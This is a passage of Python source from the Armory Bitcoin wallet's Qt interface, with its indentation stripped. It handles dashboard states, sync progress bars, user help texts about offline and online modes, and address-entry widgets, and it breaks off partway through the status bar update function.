elif phase==Cpp.BDMPhase_ResolveHashes:
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Resolving Tx Hashes'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.lblTimeLeftBuild.setVisible(False)
self.barProgressScan.setFormat('')
self.barProgressScan.setValue(100)
self.barProgressScan.setRange(0,100)
self.barProgressScan.setFormat('%p%')
showPct = True
if tleft != 2**32 - 1:
tstring = secondsToHumanTime(tleft)
else:
tstring = "N/A"
showPct = False
pvalue = pct*100
if showPct:
if phase==BDMPhase_BlockHeaders or phase==BDMPhase_BlockData or phase==BDMPhase_DBHeaders:
self.lblTimeLeftBuild.setText(tstring)
self.barProgressBuild.setValue(pvalue)
elif phase==BDMPhase_Rescan or phase==BDMPhase_ResolveHashes:
self.lblTimeLeftScan.setText(tstring)
self.barProgressScan.setValue(pvalue)
self.lblTimeLeftScan.setVisible(True)
elif sdmStr in ['NodeStatus_Initializing','NodeStatus_Syncing']:
self.lblDashModeSync.setVisible(True)
self.barProgressSync.setVisible(True)
self.lblTimeLeftSync.setVisible(True)
self.barProgressSync.setFormat('%p%')
self.barProgressSync.setRange(0,100)
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setValue(0)
self.barProgressBuild.setFormat('')
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(False)
self.barProgressScan.setValue(0)
self.barProgressScan.setFormat('')
if sdmStr == 'NodeStatus_Syncing':
sdmPercent = sdmState.chainState_.getProgressPct() * 100
self.lblTimeLeftSync.setText(\
"%d blocks remaining" % sdmState.chainState_.getBlocksLeft())
elif sdmStr == 'NodeStatus_Initializing':
sdmPercent = 0
self.barProgressSync.setRange(0,0)
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
else:
LOGERROR('Should not predict sync info in non init/sync SDM state')
return ('UNKNOWN','UNKNOWN', 'UNKNOWN')
self.barProgressSync.setValue(sdmPercent)
else:
LOGWARN('Called updateSyncProgress while not sync\'ing')
#############################################################################
def GetDashFunctionalityText(self, func):
"""
Outsourcing all the verbose dashboard text to here, to de-clutter the
logic paths in the setDashboardDetails function
"""
if func.lower() == 'scanning':
return self.tr( \
'The following functionalities are available while scanning in offline mode:'
'<ul>'
'<li>Create new wallets</li>'
'<li>Generate receiving addresses for your wallets</li>'
'<li>Create backups of your wallets (printed or digital)</li>'
'<li>Change wallet encryption settings</li>'
'<li>Sign transactions created from an online system</li>'
'<li>Sign messages</li>'
'</ul>'
'<br><br><b>NOTE:</b> The Bitcoin network <u>will</u> process transactions '
'to your addresses, even if you are offline. It is perfectly '
'okay to create and distribute payment addresses while Armory is offline; '
'you just won\'t be able to verify those payments until the next time '
'Armory is online.')
elif func.lower() == 'offline':
return self.tr( \
'The following functionalities are available in offline mode:'
'<ul>'
'<li>Create, import or recover wallets</li>'
'<li>Generate new receiving addresses for your wallets</li>'
'<li>Create backups of your wallets (printed or digital)</li>'
'<li>Import private keys to wallets</li>'
'<li>Change wallet encryption settings</li>'
'<li>Sign messages</li>'
'<li><b>Sign transactions created from an online system</b></li>'
'</ul>'
'<br><br><b>NOTE:</b> The Bitcoin network <u>will</u> process transactions '
'to your addresses, regardless of whether you are online. It is perfectly '
'okay to create and distribute payment addresses while Armory is offline; '
'you just won\'t be able to verify those payments until the next time '
'Armory is online.')
elif func.lower() == 'online':
return self.tr( \
'<ul>'
'<li>Create, import or recover Armory wallets</li>'
'<li>Generate new addresses to receive coins</li>'
'<li>Send bitcoins to other people</li>'
'<li>Create one-time backups of your wallets (in printed or digital form)</li>'
'<li>Click on "bitcoin:" links in your web browser '
'(not supported on all operating systems)</li>'
'<li>Import private keys to wallets</li>'
'<li>Monitor payments to watching-only wallets and create '
'unsigned transactions</li>'
'<li>Sign messages</li>'
'<li><b>Create transactions with watching-only wallets, '
'to be signed by an offline wallet</b></li>'
'</ul>')
#############################################################################
def GetDashStateText(self, mgmtMode, state):
"""
Outsourcing all the verbose dashboard text to here, to de-clutter the
logic paths in the setDashboardDetails function
"""
# A few states don't care which mgmtMode you are in...
if state == 'NewUserInfo':
return self.tr(
'For more information about Armory, and even Bitcoin itself, you should '
'visit the <a href="https://bitcointalk.org/index.php?board=97.0">Armory Forum</a> '
'and <a href="https://bitcoin.org">Bitcoin.org</a>. If '
'you are experiencing problems using this software, please visit the '
'<a href="https://bitcointalk.org/index.php?board=97.0">Armory Forum</a>. Users '
'there will help you with any issues that you have. '
'<br><br>'
'<b><u>IMPORTANT:</u></b> Make a backup of your wallet(s)! Paper '
'backups protect you <i>forever</i> against forgotten passwords, '
'hard-drive failure, and make it easy for your family to recover '
'your funds if something terrible happens to you. <i>Each wallet '
'only needs to be backed up once, ever!</i> Without it, you are at '
'risk of losing all of your Bitcoins! '
'<br><br>')
elif state == 'OnlineFull1':
return self.tr( \
'<p><b>You now have access to all the features Armory has to offer!</b><br>'
'To see your balances and transaction history, please click '
'on the "Transactions" tab above this text. <br>'
'Here are some things you can do with Armory Bitcoin Client:'
'<br>')
elif state == 'OnlineFull2':
return ( \
(self.tr('If you experience any performance issues with Armory, '
'please confirm that Bitcoin Core is running and <i>fully '
'synchronized with the Bitcoin network</i>. You will see '
'a green checkmark in the bottom right corner of the '
'Bitcoin Core window if it is synchronized. If not, it is '
'recommended you close Armory and restart it only when you '
'see that checkmark.'
'<br><br>') if not self.doAutoBitcoind else '') + self.tr(
'<b>Please backup your wallets!</b> Armory wallets are '
'"deterministic", meaning they only need to be backed up '
'one time (unless you have imported external addresses/keys). '
'Make a backup and keep it in a safe place! All funds from '
'Armory-generated addresses will always be recoverable with '
'a paper backup, any time in the future. Use the "Backup '
'Individual Keys" option for each wallet to backup imported '
'keys.</p>'))
elif state == 'OnlineNeedSweep':
return self.tr( \
'Armory is currently online, but you have requested a sweep operation '
'on one or more private keys. This requires searching the global '
'transaction history for the available balance of the keys to be '
'swept. '
'<br><br>'
'Press the button to start the blockchain scan, which '
'will also put Armory into offline mode for a few minutes '
'until the scan operation is complete.')
elif state == 'OnlineDirty':
return self.tr( \
'<b>Wallet balances may '
'be incorrect until the rescan operation is performed!</b>'
'<br><br>'
'Armory is currently online, but addresses/keys have been added '
'without rescanning the blockchain. You may continue using '
'Armory in online mode, but any transactions associated with the '
'new addresses will not appear in the ledger. '
'<br><br>'
'Pressing the button above will put Armory into offline mode '
'for a few minutes until the scan operation is complete.')
elif state == 'OfflineNoSatoshiNoInternet':
return self.tr( \
'There is no connection to the internet, and there is no other '
'Bitcoin software running. Most likely '
'you are here because this is a system dedicated '
'to manage offline wallets! '
'<br><br>'
'<b>If you expected Armory to be in online mode</b>, '
'please verify your internet connection is active, '
'then restart Armory. If you think the lack of internet '
'connection is in error (such as if you are using Tor), '
'then you can restart Armory with the "--skip-online-check" '
'option, or change it in the Armory settings.'
'<br><br>'
'If you do not have Bitcoin Core installed, you can '
'download it from <a href="https://bitcoin.org">'
'https://bitcoin.org</a>.')
# Branch the available display text based on which Satoshi-Management
# mode Armory is using. It probably wasn't necessary to branch the
# code like this, but it helped me organize the seemingly-endless
# number of dashboard screens I need
if mgmtMode.lower()=='user':
if state == 'OfflineButOnlinePossible':
return self.tr( \
'You are currently in offline mode, but can '
'switch to online mode by pressing the button above. However, '
'it is not recommended that you switch until '
'Bitcoin Core/bitcoind is fully synchronized with the bitcoin network. '
'You will see a green checkmark in the bottom-right corner of '
'the Bitcoin Core window when it is finished.'
'<br><br>'
'Switching to online mode will give you access '
'to more Armory functionality, including sending and receiving '
'bitcoins and viewing the balances and transaction histories '
'of each of your wallets.<br><br>')
elif state == 'OfflineNoSatoshi':
bitconf = os.path.join(BTC_HOME_DIR, 'bitcoin.conf')
return self.tr( \
'You are currently in offline mode because '
'Bitcoin Core is not running. To switch to online '
'mode, start Bitcoin Core and let it synchronize with the network '
'-- you will see a green checkmark in the bottom-right corner when '
'it is complete. If Bitcoin Core is already running and you believe '
'the lack of connection is an error (especially if using proxies), '
'please see <a href="'
'https://bitcointalk.org/index.php?topic=155717.msg1719077#msg1719077">'
'this link</a> for options.'
'<br><br>'
'<b>If you prefer to have Armory do this for you</b>, '
'then please check "Let Armory run '
'Bitcoin Core in the background" under "File"->"Settings."'
'<br><br>'
'If you already know what you\'re doing and simply need '
'to fetch the latest version of Bitcoin Core, you can download it from '
'<a href="https://bitcoin.org">https://bitcoin.org</a>.')
elif state == 'OfflineNoInternet':
return self.tr( \
'You are currently in offline mode because '
'Armory could not detect an internet connection. '
'If you think this is in error, then '
'restart Armory using the "--skip-online-check" option, '
'or adjust the Armory settings and then restart Armory.'
'<br><br>'
'If this is intended to be an offline computer, note '
'that it is not necessary to have Bitcoin Core or bitcoind '
'running.' )
elif state == 'OfflineNoBlkFiles':
return self.tr( \
'You are currently in offline mode because '
'Armory could not find the blockchain files produced '
'by Bitcoin Core. Do you run Bitcoin Core (or bitcoind) '
'from a non-standard directory? Armory expects to '
'find the blkXXXX.dat files in <br><br>%1<br><br> '
'If you know where they are located, please restart '
'Armory using the "--satoshi-datadir=[path]" option '
'to notify Armory where to find them.').arg(BLKFILE_DIR)
elif state == 'Disconnected':
return self.tr( \
'Armory was previously online, but the connection to Bitcoin Core/'
'bitcoind was interrupted. You will not be able to send bitcoins '
'or confirm receipt of bitcoins until the connection is '
'reestablished. <br><br>Please check that Bitcoin Core is open '
'and synchronized with the network. Armory will <i>try to '
'reconnect</i> automatically when the connection is available '
'again. If Bitcoin Core is available again, and reconnection does '
'not happen, please restart Armory.<br><br>')
elif state == 'ScanNoWallets':
return self.tr( \
'Please wait while the global transaction history is scanned. '
'Armory will go into online mode automatically, as soon as '
'the scan is complete.')
elif state == 'ScanWithWallets':
return self.tr( \
'Armory is scanning the global transaction history to retrieve '
'information about your wallets. The "Transactions" tab will '
'be updated with wallet balance and history as soon as the scan is '
'complete. You may manage your wallets while you wait.<br><br>')
else:
LOGERROR('Unrecognized dashboard state: Mgmt:%s, State:%s', \
mgmtMode, state)
return ''
elif mgmtMode.lower()=='auto':
if state == 'OfflineBitcoindRunning':
return self.tr( \
'It appears you are already running Bitcoin software '
'(Bitcoin Core or bitcoind). '
'Unlike previous versions of Armory, you should <u>not</u> run '
'this software yourself -- Armory '
'will run it in the background for you. Either close the '
'Bitcoin application or adjust your settings. If you change '
'your settings, then please restart Armory.')
if state == 'OfflineNeedBitcoinInst':
return self.tr( \
'<b>Only one more step to getting online with Armory!</b> You '
'must install the Bitcoin software from https://bitcoin.org in order '
'for Armory to communicate with the Bitcoin network. If the '
'Bitcoin software is already installed and/or you would prefer '
'to manage it yourself, please adjust your settings and '
'restart Armory.')
if state == 'InitializingLongTime':
return self.tr(
'<b>To maximize your security, the Bitcoin engine is downloading '
'and verifying the global transaction ledger. <u>This will take '
'several hours, but only needs to be done once</u>!</b> It is '
'usually best to leave it running overnight for this '
'initialization process. Subsequent loads will only take a few '
'minutes. '
'<br><br> '
'<b>Please Note:</b> Between Armory and the underlying Bitcoin '
'engine, you need to have 120-130 GB of spare disk space available '
'to hold the global transaction history. '
'<br><br> '
'While you wait, you can manage your wallets. Make new wallets, '
'make digital or paper backups, create Bitcoin addresses to receive '
'payments, '
'sign messages, and/or import private keys. You will always '
'receive Bitcoin payments regardless of whether you are online, '
'but you will have to verify that payment through another service '
'until Armory has finished this initialization.')
if state == 'InitializingDoneSoon':
msg = self.tr( \
'The software is downloading and processing the latest activity '
'on the network related to your wallet(s). This should take only '
'a few minutes. While you wait, you can manage your wallet(s). '
'<br><br>'
'Now would be a good time to make paper (or digital) backups of '
'your wallet(s) if you have not done so already! You are protected '
'<i>forever</i> from hard-drive loss, or forgetting your password. '
'If you do not have a backup, you could lose all of your '
'Bitcoins forever!', "", len(self.walletMap))
return msg
if state == 'OnlineDisconnected':
return self.tr( \
'Armory\'s communication with the Bitcoin network was interrupted. '
'This usually does not happen unless you closed the process that '
'Armory was using to communicate with the network. Armory requires '
'%1 to be running in the background, and this error pops up if it '
'disappears.'
'<br><br>You may continue in offline mode, or you can close '
'all Bitcoin processes and restart Armory.').arg(os.path.basename(TheSDM.executable))
if state == 'OfflineBadConnection':
return self.tr( \
'Armory has experienced an issue trying to communicate with the '
'Bitcoin software. The software is running in the background, '
'but Armory cannot communicate with it through RPC as it expects '
'to be able to. If you changed any settings in the Bitcoin home '
'directory, please make sure that RPC is enabled and that it is '
'accepting connections from localhost. '
'<br><br>'
'If you have not changed anything, please export the log file '
'(from the "File" menu) and open an issue at https://github.com/goatpig/BitcoinArmory/issues')
if state == 'OfflineSatoshiAvail':
return self.tr( \
'Armory does not detect internet access, but it does detect '
'running Bitcoin software. Armory is in offline-mode. <br><br>'
'If you are intending to run an offline system, you will not '
'need to have the Bitcoin software installed on the offline '
'computer. It is only needed for the online computer. '
'If you expected to be online and '
'the absence of internet is an error, please restart Armory '
'using the "--skip-online-check" option. ')
if state == 'OfflineForcedButSatoshiAvail':
return self.tr( \
'Armory was started in offline-mode, but detected you are '
'running Bitcoin software. If you are intending to run an '
'offline system, you will <u>not</u> need to have the Bitcoin '
'software installed or running on the offline '
'computer. It is only needed on the online computer. ')
if state == 'OfflineBadDBEnv':
return self.tr( \
'The Bitcoin software indicates there '
'is a problem with its databases. This can occur when '
'Bitcoin Core/bitcoind is upgraded or downgraded, or sometimes '
'just by chance after an unclean shutdown.'
'<br><br>'
'You can either revert your installed Bitcoin software to the '
'last known working version (but not earlier than version 0.8.1) '
'or delete everything <b>except</b> "wallet.dat" from your Bitcoin '
'home directory '
'<font face="courier"><b>%1</b></font>'
'<br><br>'
'If you choose to delete the contents of the Bitcoin home '
'directory, you will have to do a fresh download of the blockchain '
'again, which will require a few hours the first '
'time.').arg(self.satoshiHomePath)
if state == 'OfflineBtcdCrashed':
sout = '' if TheSDM.btcOut is None else str(TheSDM.btcOut)
serr = '' if TheSDM.btcErr is None else str(TheSDM.btcErr)
soutHtml = '<br><br>' + '<br>'.join(sout.strip().split('\n'))
serrHtml = '<br><br>' + '<br>'.join(serr.strip().split('\n'))
soutDisp = '<b><font face="courier">StdOut: %s</font></b>' % soutHtml
serrDisp = '<b><font face="courier">StdErr: %s</font></b>' % serrHtml
if len(sout)>0 or len(serr)>0:
return (self.tr(
'There was an error starting the underlying Bitcoin engine. '
'This should not normally happen. Usually it occurs when you '
'have been using Bitcoin Core prior to using Armory, especially '
'if you have upgraded or downgraded Bitcoin Core recently. '
'Output from bitcoind:<br>') + \
(soutDisp if len(sout)>0 else '') + \
(serrDisp if len(serr)>0 else '') )
else:
return ( self.tr(
'There was an error starting the underlying Bitcoin engine. '
'This should not normally happen. Usually it occurs when you '
'have been using Bitcoin Core prior to using Armory, especially '
'if you have upgraded or downgraded Bitcoin Core recently. '
'<br><br> '
'Unfortunately, this error is so strange that Armory does not '
'recognize it. Please go to "Export Log File" from the "File" '
'menu and submit an issue at https://github.com/goatpig/BitcoinArmory/issues. '
'We apologize for the inconvenience!'))
# TODO - move out of polling and call on events
#############################################################################
def setDashboardDetails(self, INIT=False):
"""
We've dumped all the dashboard text into the above 2 methods in order
to declutter this method.
"""
if self.isShuttingDown:
return
sdmStr = TheSDM.getSDMStateStr()
bdmState = TheBDM.getState()
descr = ''
descr1 = ''
descr2 = ''
# Methods for showing/hiding groups of widgets on the dashboard
def setBtnRowVisible(r, visBool):
for c in range(3):
self.dashBtns[r][c].setVisible(visBool)
def setSyncRowVisible(b):
self.lblDashModeSync.setVisible(b)
self.barProgressSync.setVisible(b)
self.lblTimeLeftSync.setVisible(b)
def setBuildRowVisible(b):
self.lblDashModeBuild.setVisible(b)
self.barProgressBuild.setVisible(b)
self.lblTimeLeftBuild.setVisible(b)
def setScanRowVisible(b):
self.lblDashModeScan.setVisible(b)
self.barProgressScan.setVisible(b)
self.lblTimeLeftScan.setVisible(b)
def setOnlyDashModeVisible():
setSyncRowVisible(False)
setBuildRowVisible(False)
setScanRowVisible(False)
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setVisible(True)
def setBtnFrameVisible(b, descr=''):
self.frmDashMidButtons.setVisible(b)
self.lblDashBtnDescr.setVisible(len(descr)>0)
self.lblDashBtnDescr.setText(descr)
if INIT:
setBtnFrameVisible(False)
setBtnRowVisible(DASHBTNS.Install, False)
setBtnRowVisible(DASHBTNS.Browse, False)
setBtnRowVisible(DASHBTNS.Instruct, False)
setBtnRowVisible(DASHBTNS.Settings, False)
setBtnRowVisible(DASHBTNS.Close, False)
setOnlyDashModeVisible()
if sdmStr != self.lastSDMStr:
if sdmStr == "NodeStatus_Offline":
# User is letting Armory manage the Satoshi client for them.
setSyncRowVisible(False)
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
# There's a whole bunch of stuff that has to be hidden/shown
# depending on the state... set some reasonable defaults here
setBtnFrameVisible(False)
setBtnRowVisible(DASHBTNS.Browse, False)
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnRowVisible(DASHBTNS.Close, False)
if self.internetStatus == INTERNET_STATUS.Unavailable or CLI_OPTIONS.offline:
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
setOnlyDashModeVisible()
self.lblDashModeSync.setText( self.tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
if TheSDM.satoshiIsAvailable():
self.frmDashMidButtons.setVisible(True)
setBtnRowVisible(DASHBTNS.Close, True)
if CLI_OPTIONS.offline:
# Forced offline but bitcoind is running
LOGINFO('Dashboard switched to auto-OfflineForcedButSatoshiAvail')
descr1 += self.GetDashStateText('Auto', 'OfflineForcedButSatoshiAvail')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
LOGINFO('Dashboard switched to auto-OfflineSatoshiAvail')
descr1 += self.GetDashStateText('Auto', 'OfflineSatoshiAvail')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
LOGINFO('Dashboard switched to auto-OfflineNoSatoshiNoInternet')
setBtnFrameVisible(True, \
self.tr('In case you actually do have internet access, you can use '
'the following links to get Armory installed. Or change '
'your settings.'))
setBtnRowVisible(DASHBTNS.Browse, True)
setBtnRowVisible(DASHBTNS.Settings, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
descr1 += self.GetDashStateText('Auto','OfflineNoSatoshiNoInternet')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
elif sdmStr == "NodeStatus_BadPath":
setOnlyDashModeVisible()
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
self.lblDashModeSync.setText( self.tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
LOGINFO('Dashboard switched to auto-cannotFindExeHome')
self.lblDashModeSync.setText(self.tr('Cannot find Bitcoin Home Directory'), \
size=4, bold=True)
setBtnRowVisible(DASHBTNS.Close, TheSDM.satoshiIsAvailable())
setBtnRowVisible(DASHBTNS.Install, True)
setBtnRowVisible(DASHBTNS.Browse, True)
setBtnRowVisible(DASHBTNS.Settings, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
self.btnModeSwitch.setVisible(True)
self.btnModeSwitch.setText(self.tr('Check Again'))
setBtnFrameVisible(True)
descr1 += self.GetDashStateText('Auto', 'OfflineNeedBitcoinInst')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
elif sdmStr == "NodeStatus_Initializing" or \
sdmStr == "NodeStatus_Syncing":
self.wasSynchronizing = True
LOGINFO('Dashboard switched to auto-InitSync')
self.lblBusy.setVisible(True)
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
self.updateSyncProgress()
# If torrent ever ran, leave it visible
setSyncRowVisible(True)
setScanRowVisible(True)
if sdmStr == "NodeStatus_Initializing":
self.lblDashModeSync.setText( self.tr('Initializing Bitcoin Engine'), size=4, bold=True, color='Foreground')
elif sdmStr == "NodeStatus_Syncing":
self.lblDashModeSync.setText( self.tr('Synchronizing with Network'), size=4, bold=True, color='Foreground')
self.lblDashModeBuild.setText( self.tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
descr1 += self.GetDashStateText('Auto', 'InitializingDoneSoon')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnFrameVisible(True, \
self.tr('Since version 0.88, Armory runs bitcoind in the '
'background. You can switch back to '
'the old way in the Settings dialog. '))
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
self.lastSDMStr = sdmStr
if bdmState == BDM_BLOCKCHAIN_READY:
setOnlyDashModeVisible()
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, True)
self.lblBusy.setVisible(False)
if self.netMode == NETWORKMODE.Disconnected:
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setText( self.tr('Armory is disconnected'), size=4, color='TextWarn', bold=True)
descr = self.GetDashStateText('User','Disconnected')
descr += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr)
else:
# Fully online mode
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setText( self.tr('Armory is online!'), color='TextGreen', size=4, bold=True)
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, True)
descr = self.GetDashStateText('User', 'OnlineFull1')
descr += self.GetDashFunctionalityText('Online')
descr += self.GetDashStateText('User', 'OnlineFull2')
self.lblDashDescr1.setText(descr)
elif bdmState == BDM_SCANNING or bdmState == BDM_UNINITIALIZED:
LOGINFO('Dashboard switched to "Scanning" mode')
setSyncRowVisible(False)
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(True)
self.lblBusy.setVisible(True)
self.btnModeSwitch.setVisible(False)
if sdmStr == 'NodeStatus_Ready':
self.barProgressSync.setVisible(True)
self.lblTimeLeftSync.setVisible(True)
self.lblDashModeSync.setVisible(True)
self.lblTimeLeftSync.setText('')
self.lblDashModeSync.setText( self.tr('Synchronizing with Network'), \
size=4, bold=True, color='DisableFG')
else:
self.barProgressSync.setVisible(False)
self.lblTimeLeftSync.setVisible(False)
self.lblDashModeSync.setVisible(False)
if len(unicode(self.lblDashModeBuild.text()).strip()) == 0:
self.lblDashModeBuild.setText( self.tr('Preparing Databases'), \
size=4, bold=True, color='Foreground')
if len(unicode(self.lblDashModeScan.text()).strip()) == 0:
self.lblDashModeScan.setText( self.tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
if len(self.walletMap)==0:
descr = self.GetDashStateText('User','ScanNoWallets')
else:
descr = self.GetDashStateText('User','ScanWithWallets')
descr += self.GetDashStateText('Auto', 'NewUserInfo')
descr += self.GetDashFunctionalityText('Scanning') + '<br>'
self.lblDashDescr1.setText(descr)
self.lblDashDescr2.setText('')
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Dash)
elif bdmState == BDM_OFFLINE:
pass
else:
LOGERROR('What the heck blockchain mode are we in? %s', bdmState)
self.lblDashModeSync.setContentsMargins( 50,5,50,5)
self.lblDashModeBuild.setContentsMargins(50,5,50,5)
self.lblDashModeScan.setContentsMargins( 50,5,50,5)
vbar = self.dashScrollArea.verticalScrollBar()
# On Macs, this causes the main window scroll area to keep bouncing back
# to the top. Not setting the value seems to fix it. DR - 2014/02/12
if not OS_MACOSX:
vbar.setValue(vbar.minimum())
if self.lblBusy.isVisible():
self.numHeartBeat += 1
self.lblBusy.setPixmap(QPixmap(':/loadicon_%d.png' % \
(self.numHeartBeat%6)))
#############################################################################
def createToolTipWidget(self, tiptext, iconSz=2):
"""
The <u></u> is to signal to Qt that it should be interpreted as HTML/Rich
text even if no HTML tags are used. This appears to be necessary for Qt
to wrap the tooltip text.
"""
fgColor = htmlColor('ToolTipQ')
lbl = QLabel('<font size=%d color=%s>(?)</font>' % (iconSz, fgColor))
lbl.setMaximumWidth(relaxedSizeStr(lbl, '(?)')[0])
def setAllText(wself, txt):
def pressEv(ev):
QWhatsThis.showText(ev.globalPos(), txt, self)
wself.mousePressEvent = pressEv
wself.setToolTip('<u></u>' + txt)
# Calling setText on this widget will update both the tooltip and QWT
from types import MethodType
lbl.setText = MethodType(setAllText, lbl)
lbl.setText(tiptext)
return lbl
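# Illustrative usage (not from the original code): the returned label can be
# placed in any layout, and calling its patched setText() later updates both
# the tooltip and the QWhatsThis text at once.
#
#   ttipExample = self.createToolTipWidget(self.tr('Help text goes here'))
#   someLayout.addWidget(ttipExample)            # hypothetical layout
#   ttipExample.setText(self.tr('Updated help text'))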
#############################################################################
def createAddressEntryWidgets(self, parent, initString='', maxDetectLen=128,
boldDetectParts=0, **cabbKWArgs):
"""
If you are putting the LBL_DETECT somewhere that is space-constrained,
set maxDetectLen to a smaller value. It will limit the number of chars
to be included in the autodetect label.
"cabbKWArgs" is "create address book button kwargs"
Here's the signature of that function... you can pass any named args
to this function and they will be passed along to createAddrBookButton
def createAddrBookButton(parent, targWidget, defaultWltID=None,
actionStr="Select", selectExistingOnly=False,
selectMineOnly=False, getPubKey=False,
showLockboxes=True)
Returns three widgets that can be put into layouts:
[[QLineEdit: addr/pubkey]] [[Button: Addrbook]]
[[Label: Wallet/Lockbox/Addr autodetect]]
"""
addrEntryObjs = {}
addrEntryObjs['QLE_ADDR'] = QLineEdit()
addrEntryObjs['QLE_ADDR'].setText(initString)
addrEntryObjs['BTN_BOOK'] = createAddrBookButton(parent,
addrEntryObjs['QLE_ADDR'],
**cabbKWArgs)
addrEntryObjs['LBL_DETECT'] = QRichLabel('')
addrEntryObjs['CALLBACK_GETSCRIPT'] = None
##########################################################################
# Create a function that reads the user string and updates labels if
# the entry is recognized. This will be used to automatically show the
# user that what they entered is recognized and gives them more info
#
# It's a little awkward to put this whole thing in here... this could
# probably use some refactoring
def updateAddrDetectLabels():
try:
enteredText = str(addrEntryObjs['QLE_ADDR'].text()).strip()
scriptInfo = self.getScriptForUserString(enteredText)
displayInfo = self.getDisplayStringForScript(
scriptInfo['Script'], maxDetectLen, boldDetectParts,
prefIDOverAddr=scriptInfo['ShowID'])
dispStr = displayInfo['String']
if displayInfo['WltID'] is None and displayInfo['LboxID'] is None:
addrEntryObjs['LBL_DETECT'].setText(dispStr)
else:
addrEntryObjs['LBL_DETECT'].setText(dispStr, color='TextBlue')
# No point in repeating what the user just entered
addrEntryObjs['LBL_DETECT'].setVisible(enteredText != dispStr)
addrEntryObjs['QLE_ADDR'].setCursorPosition(0)
except:
#LOGEXCEPT('Invalid recipient string')
addrEntryObjs['LBL_DETECT'].setVisible(False)
# End function to be connected
##########################################################################
# Now actually connect the entry widgets
parent.connect(addrEntryObjs['QLE_ADDR'], SIGNAL('textChanged(QString)'),
updateAddrDetectLabels)
updateAddrDetectLabels()
# Create a func that can be called to get the script that was entered
# This uses getScriptForUserString() which actually returns 4 vals
# rawScript, wltIDorNone, lboxIDorNone, addrStringEntered
# (The last one is really only used to determine what info is most
# relevant to display to the user...it can be ignored in most cases)
def getScript():
entered = str(addrEntryObjs['QLE_ADDR'].text()).strip()
return self.getScriptForUserString(entered)
addrEntryObjs['CALLBACK_GETSCRIPT'] = getScript
return addrEntryObjs
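# Illustrative usage (not from the original code): place the three returned
# widgets in a dialog and call the stored callback to resolve the entry.
#
#   objs = self.createAddressEntryWidgets(dlg)   # hypothetical parent 'dlg'
#   lay.addWidget(objs['QLE_ADDR'])
#   lay.addWidget(objs['BTN_BOOK'])
#   lay.addWidget(objs['LBL_DETECT'])
#   scriptInfo = objs['CALLBACK_GETSCRIPT']()    # whatever getScriptForUserString returns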
#############################################################################
def getScriptForUserString(self, userStr):
return getScriptForUserString(userStr, self.walletMap, self.allLockboxes)
#############################################################################
def getDisplayStringForScript(self, binScript, maxChars=256,
doBold=0, prefIDOverAddr=False,
lblTrunc=12, lastTrunc=12):
return getDisplayStringForScript(binScript, self.walletMap,
self.allLockboxes, maxChars, doBold,
prefIDOverAddr, lblTrunc, lastTrunc)
#############################################################################
def updateWalletData(self):
for wltid in self.walletMap:
self.walletMap[wltid].getBalancesAndCountFromDB()
self.walletMap[wltid].getAddrDataFromDB()
for lbid in self.cppLockboxWltMap:
self.cppLockboxWltMap[lbid].getBalancesAndCountFromDB(\
TheBDM.topBlockHeight, IGNOREZC)
#############################################################################
def updateStatusBarText(self):
if self.nodeStatus.status_ == Cpp.NodeStatus_Online:
haveRPC = (self.nodeStatus.rpcStatus_ == RpcStatus_Online)
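# Color coding: green when the node is online and RPC is reachable, purple
# when connected without RPC, and red (further down) when the node is offline.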
if haveRPC:
self.lblArmoryStatus.setText(\
self.tr('<font color=%1>Connected (%2 blocks)</font> ').arg(
htmlColor('TextGreen'), str(TheBDM.getTopBlockHeight())))
else:
self.lblArmoryStatus.setText(\
self.tr('<font color=%1><b>Connected (%2 blocks)</b></font> ').arg(
htmlColor('TextPurple'), str(TheBDM.getTopBlockHeight())))
def getToolTipTextOnline():
tt = QString()
if not haveRPC:
tt = self.tr('RPC disabled!<br><br>')
blkRecvAgo = RightNow() - self.blkReceived
